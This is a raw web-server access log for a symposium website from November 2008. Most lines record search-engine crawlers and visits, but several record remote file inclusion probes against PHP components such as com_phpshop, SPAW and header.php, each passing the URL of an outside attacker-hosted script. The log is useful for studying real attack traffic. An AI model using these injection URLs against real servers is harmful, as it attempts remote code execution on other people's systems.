220.80.108.77 - - [23/Nov/2008:23:30:42 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.impulsegamer.com/newsletter/attachments/sistem.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
220.80.108.77 - - [23/Nov/2008:23:30:43 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.impulsegamer.com/newsletter/attachments/sistem.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
72.30.142.89 - - [24/Nov/2008:00:04:18 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.89 - - [24/Nov/2008:00:04:19 -0500] "GET /logs/access.log HTTP/1.0" 200 375064 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.15 - - [24/Nov/2008:03:53:32 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [24/Nov/2008:03:53:32 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
38.99.13.124 - - [24/Nov/2008:03:54:22 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
193.47.80.36 - - [24/Nov/2008:04:47:52 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [24/Nov/2008:04:47:52 -0500] "GET /Registration.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
124.115.0.111 - - [24/Nov/2008:04:51:20 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.0.111 - - [24/Nov/2008:04:51:21 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
67.15.60.41 - - [24/Nov/2008:05:15:54 -0500] "GET /logs/access.log HTTP/1.1" 200 376537 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" 1 www.geil-symposium.com
211.43.212.56 - - [24/Nov/2008:08:50:27 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" 0 www.geil-symposium.com
211.43.212.56 - - [24/Nov/2008:08:50:27 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" 0 www.geil-symposium.com
66.249.71.103 - - [24/Nov/2008:09:17:52 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.105 - - [24/Nov/2008:09:17:52 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
38.105.83.11 - - [24/Nov/2008:10:09:03 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.105.83.11 - - [24/Nov/2008:10:09:06 -0500] "GET /logs HTTP/1.1" 301 343 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.105.83.11 - - [24/Nov/2008:10:09:14 -0500] "GET /logs/ HTTP/1.1" 200 385 "http://www.geil-symposium.com/logs" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.105.83.11 - - [24/Nov/2008:10:09:31 -0500] "GET /logs/error.log HTTP/1.1" 200 81141 "http://www.geil-symposium.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.105.83.11 - - [24/Nov/2008:10:09:31 -0500] "GET /logs/access.log HTTP/1.1" 200 25939 "http://www.geil-symposium.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
66.235.124.38 - - [24/Nov/2008:10:36:12 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [24/Nov/2008:10:36:12 -0500] "GET /Scholarship.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
67.15.60.41 - - [24/Nov/2008:11:29:01 -0500] "GET /logs/access.log HTTP/1.1" 200 379025 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" 1 www.geil-symposium.com
208.80.194.54 - - [24/Nov/2008:13:26:51 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={D7ECCE72-597A-4630-BE66-BD3B0F523C05}; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1)" 0 www.geil-symposium.com
67.195.37.190 - - [24/Nov/2008:16:53:45 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [24/Nov/2008:16:53:47 -0500] "GET /logs/access.log HTTP/1.0" 200 379680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
208.80.194.49 - - [24/Nov/2008:17:18:37 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1; Charter B1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
114.111.36.26 - - [24/Nov/2008:19:42:24 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
114.111.36.26 - - [24/Nov/2008:19:42:30 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
72.94.249.34 - - [24/Nov/2008:19:55:44 -0500] "GET / HTTP/1.1" 200 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
208.111.154.15 - - [24/Nov/2008:20:21:54 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [24/Nov/2008:20:21:54 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [24/Nov/2008:22:44:57 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [24/Nov/2008:22:44:58 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
207.44.238.31 - - [25/Nov/2008:04:01:23 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.duenzen.de//modules/request/bot.txt?? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" 0 www.geil-symposium.com
207.44.238.31 - - [25/Nov/2008:04:01:24 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.duenzen.de//modules/request/bot.txt?? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" 0 www.geil-symposium.com
66.40.52.31 - - [25/Nov/2008:04:14:04 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" 0 www.geil-symposium.com
66.40.52.31 - - [25/Nov/2008:04:14:04 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" 0 www.geil-symposium.com
64.246.161.30 - - [25/Nov/2008:08:10:58 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.161.30 - - [25/Nov/2008:08:10:58 -0500] "GET / HTTP/1.1" 200 326 "http://whois.domaintools.com/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
67.15.60.41 - - [25/Nov/2008:09:16:22 -0500] "GET /logs/access.log HTTP/1.1" 200 382781 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" 0 www.geil-symposium.com
124.115.0.111 - - [25/Nov/2008:09:52:40 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.0.111 - - [25/Nov/2008:09:52:40 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
208.111.154.15 - - [25/Nov/2008:14:38:12 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [25/Nov/2008:14:38:13 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.49 - - [25/Nov/2008:17:26:14 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; yie5.5_SBCDSL; SV1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
68.177.202.43 - - [25/Nov/2008:18:35:08 -0500] "GET /logs/access.log HTTP/1.1" 200 383882 "-" "cWlgWckvyanc1xxWiewbemn" 1 www.geil-symposium.com
66.235.124.38 - - [25/Nov/2008:21:05:18 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [25/Nov/2008:21:05:18 -0500] "GET /Registration.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.80.194.30 - - [25/Nov/2008:21:36:22 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={B5447483-B166-4c34-B355-80D068D48374}; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
208.111.154.16 - - [25/Nov/2008:22:23:58 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [25/Nov/2008:22:23:58 -0500] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
38.99.13.124 - - [26/Nov/2008:03:36:40 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.111.154.15 - - [26/Nov/2008:05:07:56 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [26/Nov/2008:05:07:56 -0500] "GET /Scholarship.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [26/Nov/2008:06:37:07 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Nov/2008:06:37:07 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
193.47.80.36 - - [26/Nov/2008:07:17:44 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [26/Nov/2008:07:17:44 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [26/Nov/2008:07:21:54 -0500] "GET /Venue.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
210.17.223.178 - - [26/Nov/2008:11:16:26 -0500] "GET /logs/access.log HTTP/1.1" 200 386553 "-" "77jshPxPuojtptgwgykj kmlheiPlbe" 23 www.geil-symposium.com
89.248.104.36 - - [26/Nov/2008:13:37:40 -0500] "GET /logs/access.log HTTP/1.1" 200 386708 "-" "hobguvsuklmnuwhwtfb6gmfjdggv jyjsd" 1 www.geil-symposium.com
124.115.0.169 - - [26/Nov/2008:14:59:41 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.0.169 - - [26/Nov/2008:14:59:42 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Nov/2008:15:03:45 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Nov/2008:15:03:46 -0500] "GET /Venue.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
217.148.95.133 - - [26/Nov/2008:15:39:44 -0500] "GET /errors.php?error=http://www.stpaulsepiscopal.com/images/response??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 0 www.geil-symposium.com
217.148.95.133 - - [26/Nov/2008:15:39:44 -0500] "GET /logs/errors.php?error=http://www.stpaulsepiscopal.com/images/response??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 0 www.geil-symposium.com
66.249.71.104 - - [26/Nov/2008:19:00:20 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.105 - - [26/Nov/2008:19:00:20 -0500] "GET /publications.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
89.248.104.36 - - [26/Nov/2008:19:22:20 -0500] "GET /logs/access.log HTTP/1.1" 200 388505 "-" "ppitwvylptefjlj3uvfueXwrbamvrwuiXk" 2 www.geil-symposium.com
68.177.202.43 - - [26/Nov/2008:20:41:54 -0500] "GET /logs/access.log HTTP/1.1" 200 388661 "-" "ojkksnghjlkg hkskm xgbqfacmycytqsguaf c" 2 www.geil-symposium.com
208.111.154.16 - - [26/Nov/2008:21:10:34 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Nov/2008:21:10:34 -0500] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.37 - - [26/Nov/2008:21:57:30 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; (R1 1.5); Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
66.235.124.38 - - [26/Nov/2008:22:15:14 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [26/Nov/2008:22:15:15 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
85.214.37.182 - - [27/Nov/2008:00:13:47 -0500] "GET //header.php?abspath=http://www.duenzen.de//modules/request/bot.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" 0 www.geil-symposium.com
85.214.37.182 - - [27/Nov/2008:00:13:48 -0500] "GET /logs//header.php?abspath=http://www.duenzen.de//modules/request/bot.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" 0 www.geil-symposium.com
208.80.194.45 - - [27/Nov/2008:01:39:01 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CoxIE55; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" 0 www.geil-symposium.com
208.111.154.15 - - [27/Nov/2008:04:51:39 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [27/Nov/2008:04:51:40 -0500] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.195.37.111 - - [27/Nov/2008:09:02:46 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.111 - - [27/Nov/2008:09:02:47 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.111 - - [27/Nov/2008:09:02:56 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
210.18.76.77 - - [27/Nov/2008:09:46:19 -0500] "GET /logs/access.log HTTP/1.1" 200 391534 "-" "7ktsstikehhgmtqtmpcfhfq oisiedimbv7nc" 3 www.geil-symposium.com
72.30.78.234 - - [27/Nov/2008:09:51:09 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.78.234 - - [27/Nov/2008:09:51:16 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.78.234 - - [27/Nov/2008:09:51:21 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.78.234 - - [27/Nov/2008:10:00:53 -0500] "GET /logs/access.log HTTP/1.0" 200 392267 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
124.115.0.102 - - [27/Nov/2008:13:40:34 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.4.203 - - [27/Nov/2008:22:13:25 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.4.203 - - [27/Nov/2008:22:13:26 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
67.195.37.111 - - [27/Nov/2008:23:43:33 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.111 - - [27/Nov/2008:23:43:34 -0500] "GET /logs/error.log HTTP/1.0" 200 239914 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
66.235.124.68 - - [28/Nov/2008:01:40:09 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.68 - - [28/Nov/2008:01:40:09 -0500] "GET /images/Philip_H_Geil_logo.jpg HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.80.194.55 - - [28/Nov/2008:01:56:24 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; yie6_SBCDSL; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; yplus 5.1.02b)" 0 www.geil-symposium.com
38.99.13.124 - - [28/Nov/2008:04:21:57 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.80.194.27 - - [28/Nov/2008:04:54:04 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; SpamBlockerUtility 4.7.1)" 0 www.geil-symposium.com
208.80.194.44 - - [28/Nov/2008:08:17:20 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.0; .NET CLR 2.0.50727; IEMB3; IEMB3)" 0 www.geil-symposium.com
84.74.51.120 - - [28/Nov/2008:09:28:28 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "CHemSE/Nutch-0.9 (ChemSE_crawler; http://www.chemse.com; info123@chemse.com)" 0 www.geil-symposium.com
84.74.51.120 - - [28/Nov/2008:09:28:29 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "CHemSE/Nutch-0.9 (ChemSE_crawler; http://www.chemse.com; info123@chemse.com)" 0 www.geil-symposium.com
67.15.60.41 - - [28/Nov/2008:10:45:06 -0500] "GET /logs/access.log HTTP/1.1" 200 395125 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" 0 www.geil-symposium.com
202.160.179.56 - - [28/Nov/2008:11:13:43 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [28/Nov/2008:11:13:44 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
72.30.65.47 - - [28/Nov/2008:13:01:53 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.65.47 - - [28/Nov/2008:13:01:53 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.65.47 - - [28/Nov/2008:13:34:37 -0500] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.65.47 - - [28/Nov/2008:13:34:53 -0500] "GET /logs/ HTTP/1.0" 200 369 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.65.47 - - [28/Nov/2008:13:36:23 -0500] "GET /logs/error.log HTTP/1.0" 200 241361 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.111 - - [28/Nov/2008:15:45:26 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.111 - - [28/Nov/2008:15:45:26 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.185 - - [28/Nov/2008:21:48:16 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.185 - - [28/Nov/2008:21:48:20 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.65.61 - - [29/Nov/2008:00:22:38 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.65.61 - - [29/Nov/2008:00:22:39 -0500] "GET /transportation.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.71.103 - - [29/Nov/2008:02:57:16 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.105 - - [29/Nov/2008:02:57:16 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
198.87.2.45 - - [29/Nov/2008:03:57:01 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
198.87.2.45 - - [29/Nov/2008:03:57:01 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
198.87.2.45 - - [29/Nov/2008:03:57:01 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
